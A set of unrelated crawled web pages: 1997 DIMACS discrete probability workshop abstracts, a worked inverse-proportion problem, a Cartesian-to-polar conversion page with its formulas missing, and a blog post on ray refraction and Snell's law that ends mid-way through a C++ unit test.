### Microsurveys in Discrete Probability: Abstracts #### June 2 - 6, 1997 Institute for Advanced Study, Princeton, New Jersey Organizers: David Aldous Jim Propp Presented under the auspices of the DIMACS Special Focus on Discrete Probability. #### Abstracts David Aldous University of California - Berkeley "Tree- and Forest-Valued Markov Processes" Such processes arise in several different areas. (a) The Markov chain tree theorem associates to any finite-state Markov chain an accompanying spanning-tree-valued chain (cf. Russ Lyons' talk). (b) Percolation-type processes on an infinite regular tree can be viewed as forest-valued processes (cf. Olle Haggstrom's talk). (c) There is scientific literature on coagulation-fragmentation models, in which N atoms are arranged in clusters, with specified rates for two clusters to merge into one cluster, or one cluster to split into two clusters. This typically leads to an irreversible Markov process. An alternative approach (cf. Whittle's book "Systems in Stochastic Equilibrium") is to first specify a stationary distribution via a Hamiltonian and then invent a reversible chain with that stationary distribution. The talk will briefly survey (c), and then describe a new process T(t) which relates to all these areas. T(t) is a stationary tree-valued Markov process whose stationary distribution is PGW(1), the Galton-Watson tree with Poisson(1) offspring. It evolves by attachment to each vertex at rate 1 a copy of a PGW(1) tree; when a branch becomes infinite, it is cut down. The time-reversal also has a simple description: each edge is cut at rate 1, and at rate 1 new branches arrive with the distribution PGW^*(1), which is PGW(1) conditioned to be infinite. One way T(t) arises is as a N \to infinity limit in (a) where the underlying chain is i.i.d. sampling from {1,...,N}. It relates to one aspect of (c), the "post-gelation solution of the Smoluchowski coagulation equation", which is roughly the classical random graph process (cf. Boris Pittel's talk) in which small components are forbidden to merge with large components. A broad conceptual theme is that the idea of a mean-field model can often be implemented as either a "random graph" model or an "infinite tree" model. Parallel to T(t) is a forest-valued process F(t) inside a regular infinite tree. Curiously, it is easy to do calculations with F(t) but hard to prove rigorously that it exists! Some relevant papers, in particular an extensive survey of coalescence-type processes (c), can be found via the author's homepage http://www.stat.berkeley.edu/users/aldous Richard Arratia University of Southern California On the central role of the scale invariant Poisson Processes on $(0,\infty)$ \author{Richard Arratia \thanks{ Richard Arratia is professor of mathematics at the University of Southern California. His e-mail address is {\tt rarratia@math.usc.edu} \vskip .5pc \newline Work supported in part by NSF grants DMS 90-05833 and DMS 96-26412.} } \date{January 31, 1997} Abstract: The scale invariant Poisson processes on $(0,\infty)$ play a central role in number theory, combinatorics, and genetics. They give the continuous limits which underly and unify diverse discrete structures, including the prime factorization of a uniformly chosen integer, the factorization of polynomials over finite fields, the decomposition into cycles of random permutations, the decomposition into components of random mappings, and the Ewens sampling formula. They deserve attention as one of the fundamental objects of probability theory. Scale invariance, say of a random set ${\cal X} \subset \BR$, is the property that for all $c>0$, $c {\cal X} \indist {\cal X}$. For random subsets of $(0,\infty)$, we can take logarithms to convert from scale invariance to translation invariance. Since the only translation invariant positive measures on $\BR$ are multiples $\theta \ dx$ of Lebesgue measure, with $\theta >0$, this gives a complete classification of the scale invariant Poisson processes on $(0,\infty)$. The net result is that scale invariant Poisson processes on $(0,\infty)$ have an intensity of the form $\theta \ dx \, /x$ for some $\theta >0$. The first subtle thing to realize about these scale invariant process{\em es} is that the plural is essential! That is, for translation invariant Poisson processes on $\BR$ with intensity $\theta \ dx$, there is no need to study the effect of $\theta$, since all the processes are related simply by scaling. But no such simple relation holds for the scale invariant processes: the map which constructs say the general $\theta$ process from the special case $\theta=1$ is applying the $1/\theta$ power to the location of each point. This is not a simple mapping. In particular, there are qualitative phase transitions at $\theta =1$ and at $\theta = 1 / \log 2$. For any $\theta >0$, start with the ordinary, translation invariant Poisson process on $\BR$ having intensity $\theta \ dx$ and label the points as $L_i, \ i \in \BZ$, with the natural order $L_i < L_{i+1}$. The scale-invariant process with intensity $\theta \ dx \, /x$ can be realized via $X_i := \exp(- L_i)$, which labels the points so that $X_i > X_{i+1}$. The $i^{th}$ spacing of the scale invariant Poisson process is thus $Y_i := X_i-X_{i+1}$. Theorem: for each $\theta > 0$, $\{ Y_i \} \indist \{ X_i \}$, i.e. the set of spacings, as a point process, has the same distribution as the original process. Let $T$ be the sum of the locations of all points of the scale invariant Poisson process restricted to $(0,1)$. Theorem: the Poisson-Dirichlet process is this restricted process, conditional on $T=1$. [Barbour, Tavar\'e] The random variable $T$ has a density $g$ which for $\theta=1$ is $g(u) = e^{-\gamma} \rho(u)$, where $\rho$ is Dickman's function, satisfying $\rho(u)=1$ for $0\leq u \leq 1$, and $\rho'(u)=-\rho(u-1)/u$ for $u>1$. For $0 \leq a < b <\infty$ let $T_{a,b}$ be the sum of the locations of all points of the scale invariant Poisson process restricted to $(a,b)$. Buchstab's function $\omega$, which satisfies $(u \omega(u))'=\omega(u-1)$ for $u>2$ and $u \omega(u)=1$ for $1 \leq u \leq 2$, can be described as the density of the continuous part of $T_{1/u, 1}$ evaluated at 1 in the case $\theta=1$. Consider, for any $\theta >0$, for $0\leq \beta \leq 1$, the total variation distance $H(\beta)$ between the restrictions to $[0,\beta]$ of the Poisson-Dirichlet process and the scale invariant Poisson process. We have $H(0)=0, H(1)=1$, and for $0<\beta<1$, $H(\beta) = d_{TV}( T_{0, \beta}, ( T_{0,\beta}|T=1) ).$ This can be expressed as an integral involving the densities of $T$ and $T_{\beta,1}$, [Tavar\'e] which in the special case $\theta=1$ reduces to \begin{eqnarray*} 2H(\beta) & = & e^\gamma \e | \omega(u-T)-e^{-\gamma}| \ + \rho(u) \\ & = & \int_{t>0} |\omega(u-t)-e^{-\gamma}| \rho(t) \ dt \ \ + \rho(u). \end{eqnarray*} This $H(\beta)$ gives the limit as $n \ra \infty$, of total variation distance, between the dependent system and its independent process limit, observing components of relative size at most $\beta$, for discrete systems, including the cycle decomposition of a random permutation of $n$ objects [Tavar\'e, Stark], the component decomposition of a random mapping [Stark], and the prime factorization of a random integer chosen uniformly from 1 to $n$ [Stark]. Consider the random set $A \equiv A(\theta)$, defined as the closure of the set of sums of locations of (some of) points of the scale invariant Poisson process. Trivially, $A$ is scale invariant, i.e. for any $c>0, \ cA \indist A$. Quite easily, with respect to Minkowski sums, the process $(A(\theta))_{\theta>0}$ has stationary, independent increments. The set $A$ for $\theta=1$ is the limit in distribution, using the Hausdorff metric, of spatial rescaling of the set of values $\log d$ for $d$ dividing an integer chosen uniformly from 1 to $n$. For general $\theta \neq 1$, the analogous statement holds, after conditioning on the large deviation that the random integer have $\theta \log\log n$ distinct prime divisors. It is easy to prove that for all $\theta, \p(1 \in A)<1$, and for $\theta \log 2 \leq 1, \p(1 \in A)=0$. Conversely, for $\theta \log 2 >1$, $\p(1 \in A) >0$, although we still do not have a simple probabilistic proof of this. [Tenenbaum] Persi Diaconis Cornell University New Wave Monte Carlo Just when we think things have settled down, practitioners evolve interesting ideas and spectacular claims. I will review four of these. 1) Hybrid and Nonreversible Algorithms. The algorithm of Duane, et.al. (Phys. Lett B A5, 216-222) uses Hamiltonian mechanics to drive a sampler. In joint work with Susan Holmes and Radford Neal we have abstracted the idea and proved some things. 2) Deamon Algorithms. These use an army of Maxwell's Deamons to control a random walk. In joint work with Thomas Yan some rigorous results have emerged. See Bhanot, et.al. Nucl. Phys. B235, 417-434. 3) Crossover Algorithms. People in computational group theory (Celler et.al. Comm. Alg. 23, 4931-4948) report fantastic speedups by random mating of vectors of a population. With Laurant Saloff-Coste we have managed to prove a bit and suggest extensions far from group theory. 4) Beyond Groebner Bases. In joint work with Sturmfels (See e.g. chapters 5, 6 of B. Sturmfels, Groebner Bases and Convex Polytopes (1996)) computational algebra was used to build Markov chains. In recent implementations (with David Eisenbud, Susan Holmes and Asya Rabinowitch) new ideas have been introduced that speed up (or make feasible) large scale problems. Jim Fill The Johns Hopkins University Probabilistic analysis of self-organizing search A self-organizing data structure dynamically maintains a file of records in easily retrievable order while using up little additional memory space. Recent analyses of simple Markov chain models have produced new information about such systems, including exact and asymptotic expressions, with rates of convergence to stationarity, for the distribution of search cost and for transition probabilities for the structure as a whole. My microsurvey will focus on some of the following: connections with card shuffling, list and tree structures, various reorganization rules, Markov dependent request sequences, and multi-record request schemes. A.Frieze and Wojciech Szpankowski Greedy algorithms for the shortest common superstring that are asymptotically optimal There has recently been a resurgence of interest in the {\it shortest common superstring} problem due to its important applications in molecular biology (e.g., recombination of DNA) and data compression. The problem is NP-hard, but it has been known for some time that greedy algorithms work well for this problem. More precisely, it was proved in a a recent sequence of papers that in the worst case a greedy algorithm produces a superstring that is at most $\beta$ times ($2 \leq \beta \leq 4$) worse than optimal. We analyze the problem in a probabilistic framework, and consider the optimal total overlap $O_n^{{\rm opt}}$ and the overlap $O_n^{{\rm gr}}$ produced by various greedy algorithms. These turn out to be asymptotically equivalent. We show that with high probability $\lim_{n \to \infty} {O_n^{{\rm opt}} \over n\log n} = \lim_{n \to \infty} {O_n^{{\rm gr}} \over n\log n} = {1 \over H}$ where $n$ is the number of original strings, and $H$ is the entropy of the underlying alphabet. Our results hold under a condition that the lengths of all strings are not too short. This is joint work with Wojciech Szpankowski. Anant P. Godbole Michigan Tech University A method of unbounded martingale differences, with combinatorial applications We use decoupling methods due to Kwapie\'n and Woyczy\'nski (1992) to derive an analog of the Hoeffding-Azuma exponential bound when the martingale differences are not uniformly bounded. Related inequalities due to Pinelis and de la Peña will also be presented. Applications of the method to concentration of measure questions for • proximity graphs for random scatter in d dimensions; and • the Wiener index of a random graph; and to similar questions concerning • linear independence of random binary vectors will be provided. Olle Haggstrom Chalmers University of Technology Dynamical percolation: early results and open problems Dynamical percolation provides a way of introducing time dynamics in static percolation models such as the standard bond percolation setup. Any event which has probability 1 in the static model will almost surely happen at Lebesgue-almost every time $t$ in the dynamical counterpart. The main questions studied are therfore of the type "can there be exceptional times?". Interestingly, the answer is often yes if the static model is taken to be critical. I intend to survey what has been done in dynamical percolation since the subject entered the probability arena two years ago, and to state the main open problems. Martin Hildebrand SUNY-Albany "Rates of Convergence for a Non-reversible Version of the Metropolis Algorithm" Diaconis, Holmes, and Neal have proposed a variation of the Metropolis algorithm. Like the usual Metropolis algorithm, this variation is a Markov chain which converges to a stationary probability distribution, and ratios of this stationary probability are used in the transition probabilities. This variation involves the duplication of the set of states. The transition probabilities will depend on which duplicate the Markov chain is at just before the transition. For some probabilities and choices of a parameter which controls probabilities of going between the duplicates of the set of states, this variation converges to stationary faster than the corresponding ordinary Metropolis algorithm. This talk will outline proofs of how fast the variation converges to the uniform distribution in some of these circumstances. Alan Frieze and Ravi Kannan, Carnegie-Mellon University Quick approximations to matrices A typical application of probability to algorithms is to sample a randomly chosen subset of the data and make an inference about all the data with high probability. We discuss our recent algorithm of this flavour to compute approximations to a given matrix : given an m X n matrix A with entries between say -1 and 1, and an error parameter a between 0 and 1, we find a matrix D which is the sum of at most O(1/a^2) simple rank 1 matrices so that the sum of entries of any submatrix (among the 2^{m+n}) of (A-D) is at most (amn) in absolute value. Our algorithm takes time dependent only on a and the allowed probability of failure (not on m,n). We draw on two lines of research to develop the algorithm : one is >from the papers of Arora, Karger and Karpinsky, Fernandez de la Vega and most directly Goldwasser, Goldreich and Ron who develop algorithms of this flavour for a set of graph problems, typical of which is the maximum cut problem. The second one is built around the fundamental Regularity Lemma of Szemeredi in Graph Theory. >From the matrix approximation, the graph algorithms and the Regularity Lemma and several other results follow in a uniform way. We also generalize our approximations to multi-dimensional arrays and >from that derive certain other algorithms. Intae Jeon Ohio State University Gelation Phenomena Our talk concerns the Smoluchowski coagulation-fragmentation equation, which is an infinite set of non-linear ordinary differential equations describing the evolution of a mono-disperse system of particles in a well stirred solution. Using a stochastic approximation, more precisely, by approximating the solutions of the Smoluchowski equations by a sequence of finite Markov chains defined on a compact subset of $l_2$ space, we investigate the qualitative behavior of the solutions. Our talk includes the following: Consider the Smoluchowski coagulation equation $$\dot{C_{t}(j)}={1\over 2}\sum_{k=1}^{j-1}K(j-k,k)C_{t}(j-k) C_t(k)-\sum_{k=1}^{\infty}K(j,k)C_t(j)C_t(k),$$ $j=1,2,3,\cdots$, where $C_t(j)\geq 0$ is the expected number of $j-$clusters ( a cluster consisting of $j-$particles) per unit volume, and $K$ is a nonnegative symmetric function which represents the coagulation rate of $i$ and $j-$clusters. Suppose $\epsilon (ij)^{\alpha} \leq K(i,j)\leq M(ij)^{\beta}$, where ${1\over 2}< \alpha\leq \beta<1,$ and $\epsilon,M >0$. Then there exists a solution $C_t$ and $0\leq t_0<\infty$ such that $C_0(i)=\rho\delta_{1i}$ and $\sum_{i=1} ^{\infty}iC_t(i)<\sum_{i=1}^{\infty}iC_0(i)=\rho$, for all $t> t_0,$ i.e., gelation phenomenon (or density dropping phenomenon, or emergence of giant cluster) occurs in a finite time.\\ Harry Kesten Cornell University Distinguishing and reconstructing sceneries from observations along random walk paths We discuss some results and some open problems of the following type: Let G be an infinite, connected, locally finite graph, and let $\xi$ and $\eta$ be maps from V to {0,1,...,k-1}, where V is the vertex set of G (such maps are called k-colorings or sceneries). Let {S_n} be a random walk on G. Can we reconstruct $\xi$ if we observe the sequence {\xi(S_n)} ? If $\xi$ and $\eta$ are known and we observe either {\xi(S_n)} or {\eta(S_n)}, but we are not told which of these alternatives prevails, can we decide (with zero probability of error) which of the two sequences were observed ? Steve Lalley Purdue University Growth Processes on Trees: The Weak Survival Phase We will survey some recent results concerning two simple stochastic growth processes on the homogeneous tree of degree >2: (1) the contact process; and (2) branching random walk. We will focus on the weak survival'' phase, in which the population grows exponentially but almost surely vacates every finite subset of the tree. We will discuss several questions of natural interest, including (i) the size of the limit set'' of the process; (ii) the asymptotic behavior of hitting probabilities; and (iii) the existence of interesting invariant measures. Laszlo Lovasz Yale University Mixing times for Markov chains In randomized algorithms solving a variety of computational tasks (approximate enumeration, volume computation, integration, simulated annealing, generation of contingency tables etc.) the key element is to sample from a given distribution over a known but large and complicated set. The basic method is to construct an ergodic Markov chain with the given stationary distribution, and then run the chain for an appropriately large number of steps to get a state that has (approximately) the desired distribution. Mathematically, the main difficulty is to quantify appropriately large'', i.e., to estimate the mixing time'' of the chain. We may want to get close to the stationary distribution in different senses, and may have different starting conditions, leading to different notions of mixing time. It turns out that this variation in the notion of mixing time should not worry us too much. All these variations fall in a small number of classes, where mixing measures in the same class are within absolute constant factors of each other This line of research was initiated by Aldous. Most of this is joint work with Peter Winkler, some with David Aldous and Andrew Beveridge. Russell Lyons Indiana U. (Bloomington) and IAS (Jerusalem) RANDOM SPANNING FORESTS The suject of random spanning forests began in 1991, growing out of random spanning trees, which have been studied (in some sense) since Kirchhoff in 1847. They have intimate connections to random walks and electric networks, as well as to harmonic Dirichlet functions. We will micro-survey the area and describe some highlights. See http://www.ma.huji.ac.il/~lyons/prbtree.html for a book in progress containing more details and http://ezinfo.ucs.indiana.edu/~rdlyons/ for my homepage. Karin Nelander Chalmers University of Technology and Gothenburg University Exact Sampling From Anti-monotone Systems A new approach to Markov chain Monte Carlo simulation was recently proposed by Propp and Wilson. This approach, unlike traditional ones, yields samples which have exactly the desired distribution. The Propp-Wilson algorithm requires this distribution to have a certain structure called monotonicity. In this talk, it is shown how the algorithm can be extended to the case where monotonicity is replaced by anti-monotonicity. As an illustrating example, simulations of the hard-core model is presented. This is joint work with Olle Haggstrom. Boris Pittel Department of Mathematics, Ohio State University, Columbus, Ohio A phase transition phenomenon in the Erd\"os-R\'enyi random graph process The random graph process on $n$ vertices is the probability space of all the nested sequences of graphs $$G(n,0)\subset G(n,1)\subset\dots\subset G(n,N),$$ $N=\binom n2$, with vertex set $V=\{1,\dots,n\}$, such that $G(n,M)$ has $m$ edges, and each sample sequence has the same probability, $1/N!$. In particular, the random \lq\lq snapshot\rq\rq $G(n,m)$ is distributed uniformly on the set of all $\binom Nm$ graphs with $m$ edges. Alternatively, it is a Markov chain such that, given $G(n,m-1)$, the next graph $G(n,m)$ is obtained by adding a new edge whose location is chosen at random, uniformly among all $N-(m-1)$ still vacant sites. Erd\"os and R\'enyi undertook a first systematic study of this process back in 1960. Perhaps the most important result of their study was a discovery that, for $n$ large, the likely structure of $G(n,m)$ undergoes an abrupt change (phase transition) when $m$ passes through $n/2$. Namely, with high probability (whp), this a birth time of a giant component, that is a component of size of order $n$. Prior to this moment, the largest component is only of order $\log n$. Since then a lot of research effort has been spent on strengthening the original results and learning more about the likely evolution of the random graph, both before and after the birth of the giant component. The purpose of this talk is to survey some of the classic and more recent results and to stress the combinatorial-probabilistic techniques which were developed to obtain them. James Propp MIT "Coupling from the past: a user's guide" Coupling from the past is an approach to Monte Carlo that, when applicable, can completely eliminate initialization-bias, and sometimes requires only minor modifications to existing algorithms. I will give an overview of the method, describe the conditions under which it can be applied, and present three illustrative cases. For more on schemes that eliminate initialization-bias, see David Wilson's web-page on perfectly random sampling with Markov chains. Dana Randall Guarantees for Efficiently Sampling Lattice Configurations Simple Markov chains are often used to study large combinatorial sets. For instance, if we want to sample 3-colorings on some finite three-dimensional lattice region L, we let the state space of the Markov chain be the set of proper three colorings. Then, starting with some 3-coloring, we can iteratively update the configuration by recoloring at most one vertex at a time so as to move to another proper coloring. Closely related algorithms based on local updates are used to generate random configurations for various combinatorial problems on lattices, such as tilings, Eulerian orientations and alternating sign matrices. In each case, we will argue that the natural Markov chains are rapidly mixing'' (which guarantees that we can generate samples in polynomial time). We accomplish this be a two-step process. First, we use a very simple coupling scheme to argue that related Markov chains based on non-local moves are rapidly mixing. Then we use decomposition'' and clustering'' techniques to bound the mixing rate of the the original Markov chains in terms of the mixing rates of the non-local chains. The decomposition technique, which is work with Neal Madras, relates the mixing rate of a Markov chain to smaller chains derived from a decomposition of the state space. The clustering technique, which is work with Prasad Tetali, allows us to relate the mixing rates of the local and non-local chains. This is based on the comparison method of Diaconis and Saloff-Coste. Gesine D. Reinert Department of Mathematics, University of California, Los Angeles Coupling Constructions for Normal Approximations with Stein's Method Coupling constructions for Poisson approximation using the Chen-Stein method is now a standard technique; a systematic study of related couplings for normal approximation using Stein's method has begun only a few years ago. This small survey of coupling methods for normal approximations includes size-bias couplings, which are natural for nonnegative random variables such as counts, and zero-bias couplings, which may be applied to mean zero variables and is especially useful for variates with vanishing third moments. Alistair Sinclair University of California at Berkeley Quadratic dynamical systems'' are a natural class of non-linear stochastic processes that are used to model various phenomena in the natural sciences, such as population genetics and the kinetic theory of ideal gases. Less classically, they also provide an appropriate framework for the study of genetic algorithms for combinatorial optimization. In contrast to linear systems, which are well understood, there is little general theory available for the quantitative analysis of quadratic systems. In this talk, I will present several fundamental properties of the large class of symmetric quadratic systems acting on populations over a fixed set of types. I will go on to describe an analysis of some particular examples, including crossover systems in population genetics and a natural system defined on populations over the set of matchings in a tree. In particular, it will turn out that convergence to the limit in these systems is very rapid. This demonstrates that such systems, though non-linear, are sometimes amenable to analysis. I will also outline some of the main challenges for future work in this area. Most of the results mentioned in the talk are joint work with Yuval Rabani, Yuri Rabinovich and Avi Wigderson. Georgia Tech Isoperimetric invariants for product Markov chains We introduce new isoperimetric constants for Markov chains (and graphs) using the notion of a "discrete gradient." We derive bounds on these constants for the Cartesian product of Markov chains. Specializing our result to the hypercube, we derive a certain connectivity theorem of Margulis-Talagrand. Several intriguing questions on Cheeger-type inequalities remain open. (This is joint work with Christian Houdre'.) David Wilson University of California - Berkeley Generating random spanning trees This talk will survey known algorithms for generating random spanning trees of graphs (directed and undirected). These include algorithms based on linear algebra and algorithms based on random walks. The loop-erased random walk algorithm (the cycle-popping algorithm''), which in addition to being very efficient has also been a useful conceptual tool in the study of random spanning trees on certain infinite graphs, will be presented. Details can be found in the article How to Get a Perfectly Random Sample From a Generic Markov Chain and Generate a Random Spanning Tree of a Directed Graph by the speaker and James Propp. Also see the speaker's web-page on perfectly random sampling with Markov chains. Peter Winkler Bell Labs Ramsey Theory and Sequences of Random Variables joint work with W.T. Trotter, ASU We begin with the following odd lemma: for any sequence of events A_1,...,A_n there are i < j such that Pr(A_i and not A_j) < 1/4 + o(n^0). Generalization in three directions leads to: (1) A combinatorial problem involving shift graphs; (2) The answer to a question of Brightwell and Scheinerman concerning fractional dimension of interval orders; and (3) A finite form of de Finetti's Theorem which jettisons the exchangeability hypothesis. David Zuckerman Extractors and their Applications In this talk, I will survey extractors and their applications. An extractor is a procedure to extract randomness from a defective random source, using some additional truly random bits. Extractors have seemingly unrelated applications, such as using few random bits to do random sampling and randomized space-bounded computation, and constructing expander graphs that beat the eigenvalue bound. Previous: Participation Next: Registration Workshop Index DIMACS Homepage Contacting the Center
2014-04-23 23:24:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8079969882965088, "perplexity": 547.2000743173548}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1398223203841.5/warc/CC-MAIN-20140423032003-00355-ip-10-147-4-33.ec2.internal.warc.gz"}
https://socratic.org/questions/suppose-that-the-time-it-takes-to-do-a-job-is-inversely-proportional-to-the-numb
# Suppose that the time it takes to do a job is inversely proportional to the number of workers. That is, the more workers on the job the less time required to complete the job. Is it takes 2 workers 8 days to finish a job, how long will it take 8 workers? $8$ workers will finish the job in $2$ days. Let the number of workers be $w$ and days reqired to finish a job is $d$. Then w prop 1/d or w = k* 1/d or w*d= k ; w=2 , d=8 :. k=2*8=16 :.w*d=16 . [k is constant]. Hence the equation for job is w*d=16 ; w=8, d=? :. d=16/w=16/8=2 days. $8$ workers will finish the job in $2$ days. [Ans]
2019-12-06 06:23:43
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 8, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8731549978256226, "perplexity": 1576.246987612857}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540484815.34/warc/CC-MAIN-20191206050236-20191206074236-00117.warc.gz"}
https://wumbo.net/examples/convert-cartesian-to-polar-coordinates/
Convert Cartesian to Polar Coordinates This example shows how to convert a point from the Cartesian Coordinate System to the Polar Coordinate System. The general conversion is shown in the two equations below. Convert Cartesian to Polar Example For example, to convert the cartesian point to polar coordinates. First we solve for the hypotenuse length of the right triangle to find the length of the radius: Then use the arctangent function to find the angle: The cartesian point is equivalent to the polar point . Note, if the same calculation is performed with a calculator set to degrees instead of radians the point would be . The right triangle formed by both points is shown below: Explanation Both systems describe the position of a point in space. A point in the Polar Coordinate System is defined in terms of a radius and an angle: . A point in the Cartesian Coordinate System is defined in terms of a and component: . Both define the point relative to the origin of the system. Geometrically, the two points can be described by the right triangle below. The Pythagorean theorem relates the squared sides together on a right triangle. Since the component corresponds to the adjacent side of the right triangle and the component corresponds to the opposite side, the equation can be rearranged to give the length of the hypotenuse which corresponds to the length of the radius in a polar coordinate. The arctangent function returns the angle of a right triangle given the ratio of its opposite side over its adjacent side.
2022-08-15 05:58:33
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9164940714836121, "perplexity": 126.28303233161601}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572161.46/warc/CC-MAIN-20220815054743-20220815084743-00036.warc.gz"}
http://vertexwahn.de/2020/04/11/refraction/
I think a good way to get started with ray tracing is to begin with refraction. This is a basic operation that happens in almost every ray tracer. Refraction happens when a light ray hits another medium as shown in the following image: Of course, this is just a simplified model of how light travels through space and how light is modeled, but this is fine enough to render some pleasant pictures. According to Snell’s law, the following equation holds: $$\eta = \frac{sin(\alpha)}{sin(\beta)} = \frac{n_2}{n_1}$$ The index of refraction in vacuum is $1.0$ and for some glass material it might be for instance $1.6$. Assuming that $n_1 = 1.0$ and $n_2 = 1.6$ we can compute for an given incident ray the direction of the refracted ray. E.g. if $\alpha = 45°$ (angle of incidence) the corresponding $\beta$ angle (angle of refraction) will be approximately $26.23°$. The refractive index is defined as $n = \frac{c}{v}$ where $c$ is the speed of light in vacuum and $v$ is the speed of light in the corresponding medium. Total internal reflection describes the behavior that at some angles no light is refracted (starting at the critical angle) but instead is only reflected. Total internal reflection is the reason for Fata Morganas, e.g. a wet-looking road on a hot day. ### Critical Angle The critcal anlge at which total internal reflection happens can be computed using this formula: $$\theta_c = sin^{-1}(\frac{n_1}{n_2})$$ Total internal reflection only happens if $n_1 > n_2$ holds, which means it does not happen if we go from an optical “sparser” medium to an optical “denser” medium. ### Examples The following table list some example for a 2D scenario where we have an incident ray form “above” and hitting the interface between two different medium types. Case Normalized normal vector $\alpha$ Expected Incident vector Refraction index medium 1 Refraction index medium 2 Expected $\beta$ Expected normalized refracted vector A (0, 1) $45°$ (-1, 1) 1 1.6 26.23° (0.441975594,-0.897027075) B (0, 1) $0°$ (0,-1) 1 1.6 (0,-1) C (0, 1) $45°$ (-1, 1) 1.6 1 Not available (total internal reflection) Not available (total internal refelction) ### A test-driven development approach to implement ray refraction According to test-driven development, we write first a test before starting with the implementation. Thomas Willberger Founder, CEO and realtime rendering developer at Enscape3D once wrote in a Twitter tweet: “Software wisdom: Start with the best-debuggable, most simple implementation. Iron out early mistakes and add tests BEFORE adding bells and whistles. It‘s invaluable to know that the core part works and you do not have to suspect the whole codebase when hunting a bug.” Lets write a test for a refract function. First we have to think about a proper design. The refract function expects three input parameters: $\omega_i$, $n$ (a normal vector) and $\eta$. $\omega_i$ is the vector that points in the opposite direction of the incident vector. This is a common convention: $\omega_i$ points always towards the light source direction. So to say, $\omega_i$ is the negative direction of the incoming light. $n$ is the normal vector that points towards the direction from which the incoming ray is originating. $\eta$ is computed as the fraction of $n_2$ and $n_1$ where $n_1$ is refraction index of the medium form which the incoming ray is coming from. As a output parameter the refraction function is expected to compute the refraction vector, if there is no total internal reflection. When looling at the source code of PBRT the refraction function as four parameters. inline bool Refract(const Vector3f &wi, const Normal3f &n, Float eta, Vector3f *wt) PBRT uses the fourth parameter as an output parameter for the computed refracted vector. PBRT has the convention that for output parameters always pointers are used. Furthermore, the function returns true if there was no total internal reflection. I decided to use a similar form for my refraction function. Instead of using a pointer for the computed refraction vector, I decided to use a reference value. This is the test I came up with after several iterations: TEST(RefractionVacuumToGlass, When_IncidentVectorIs45Degrees_Then_RefratedVectorIsAbout26Degrees) { // Arrange const Normal2f normal(0.0f, 1.0f); Vector2f incident(1.0f, -1.0f); Vector2f wi = -incident; wi.normalize(); const auto refractionIndexVacuum = 1.0f; const auto refractionIndexGlass = 1.6f; // Act Vector2f refractedDirection; bool validRefraction = refract(wi, normal, refractionIndexVacuum / refractionIndexGlass, refractedDirection); // Assert EXPECT_TRUE(validRefraction); EXPECT_TRUE(refractedDirection.x() > 0.0f); EXPECT_TRUE(refractedDirection.y() < 0.0f); EXPECT_THAT(refractedDirection.norm(), ::testing::FloatEq(1.0f));
2020-07-12 18:56:43
